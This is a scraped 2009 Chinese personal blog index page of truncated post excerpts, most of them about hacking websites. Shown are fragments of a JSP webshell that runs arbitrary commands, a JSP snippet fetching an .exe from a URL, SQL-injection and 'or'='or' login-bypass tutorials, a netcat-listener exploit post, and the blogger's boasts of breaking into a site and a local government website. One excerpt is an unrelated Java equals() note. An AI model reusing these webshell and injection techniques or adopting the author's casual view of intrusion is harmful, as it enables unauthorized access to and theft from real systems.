黑色之恋's blog
百度空间 | 百度首页 
               
 
文章列表
 
2009年07月03日 星期五 上午 10:50

<%@ page language="java" contentType="text/html; charset=gb2312" %>
<%@ page language="java" import="java.util.*" %>
<%
    String[] weekdays={"","日","一","二","三","四","五","六"};
    String[] days=new String[42];
    for(int i=0;i<42;i++)
    days[i]="

 
2009年06月26日 星期五 上午 09:11

转自网络

<%@ page import="java.io.*, java.net.*" %>   
<%    
try {     
    String urlname = "http://127.0.0.1:8080/shell/1.exe";   
    URL url = new URL(urlname);   
    URLConnection conn = url.openConnection();   

 
2009年06月24日 星期三 上午 00:13

刚入侵一个站,发现这个站用的是南方企业数据网的程序,于是就找了一下漏洞信息,
网上的漏洞信息如下注入漏洞

**************************
By:XoL-!
http://www.tsbct.com
************************** 发现日期:
2008-09-25
影响版本: v10.0 v11.0

 
2009年06月08日 星期一 下午 11:00

equals 方法(是String类从它的超类Object中继承的)被用来检测两个对象是否相等,即两个对象的内容是否相等。

java语言的本意来说:如果没有重写(override)
新类的equals(),则该方法和 == 操作符一样在两个变量指向同一对象时返回真,(即比较的是引用而不是内容)
但是java推荐的是使用equals()方法来判断两个对象的内容是否一样.比如String,Date,File类就已经通过覆盖equals()方法来比较对象内容而不是引用

==用于比较引用和比较基本数据类型时具有不同的功能:

 
2009年05月22日 星期五 上午 10:31

转自网络

cx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧......

手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。
下面的语句我直接写完整的SQL语句,注入的时候稍微改改就能用了,呵呵。

但是我们是不知道表明,不知道列名的....

如果这个注入点原来的SQL语句是:"select * from FK_admin where x_name='"&username&"'"
我们可以在用户名提交的地方填

 
2009年05月21日 星期四 下午 06:41
我们在入侵ASP站的时候,会遇到很多由于代码过滤不完全,导致的万能密码入侵,也就是我们常见的'or'='or'入侵
在JSP中呢,这种情况也有,下面我们就从入侵实战开始到本地搭建简单分析下产生的原因,以及简单的2种修复方法
(一)入侵实战:

 
2009年05月05日 星期二 下午 01:31

博客暂停更新。

      整理心情。。。。。。潜心修炼。。。。。。。。。。。。。

 
2009年05月03日 星期日 上午 10:17

作者:Kindle
MSN :Kindle@live.cn
Blog:http://hi.baidu.com/system_exp
Team:反安全技术小组 (http://bbs.exploits.com.cn)

首先外网nc监听对应的端口

url语句简单如下所示:

http://www.exploits.com.

 
2009年05月02日 星期六 下午 10:16

<%@ page language="java" import="java.util.*,java.io.*,java.net.*" pageEncoding="gb2312"%>
<%!
public static String exec(String cmd, Writer out) throws IOException
{
StringBuffer sb = new StringBuffer();
int len = 0;
byte by[] = new byte[cmd.length() * 10];
Process p = Runtime.getRuntime().exec(cmd);
InputStream is = p.getInputStream();
while((len = is.read(by)) != -1)
{
    String str = n

 
2009年04月29日 星期三 下午 12:51

本地政府网。。。。小站一个,本人很少动政府站,做事一向很低调。。。。但今天简单动了一下本地政府站。。记得刚入道的时候看过这站,可能当时掌握的知识有限,没能拿下该站,今天看了一下,简单搞定。。。一定程度上说明自己的知识在不断增长,所以纪念下。。。

继续努力。。。。。

 
     
 
 
日历
 
     
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Vb(8)
 
     
 
文章存档
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新评论
 
文章评论|照片评论


这个问题的确要思考··· 呵呵··
 
 

你忘记我们小组也有的?
 

背景音乐的第二首歌叫什么来着
 

谢谢楼主
 
     
 
我的照片秀
 
   
 
留言板
 

漂亮的空间,向你请教喽,来我空间座座吧
 

关注你很久了,我能成为你的朋友吗?
 

你是个可爱的人,祝朋友每天快乐~~~
 

缘分存在心里,是一种浪漫的梦境; 思念藏在心底,是一段芬芳的记忆; 友情放在心上,...
 

呵呵 兄弟你太有才了! 有时间交流下技术!
 

博主 能给你做的软件我么? 我QQ:997565 不想自己干...
 

你好! 你这个投票的http://hi.baidu.com/forhack/blog/item/8b5ca46d555a66fe4216943...
 

迫切期待你的回复哈~
 

兄弟 你jsp太厉害了 能不能帮帮我!我最近毕设遇到很多问题!小弟在此先谢啦!
 
 
     
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
最近访客
 
 

顶级葙守

百变迅雷剑

feiniao23

ou_ri

sunkuan56

lfort08

欧阳oycl

寂寞ぁ黑夜
     
 
背景音乐
 


©2009 Baidu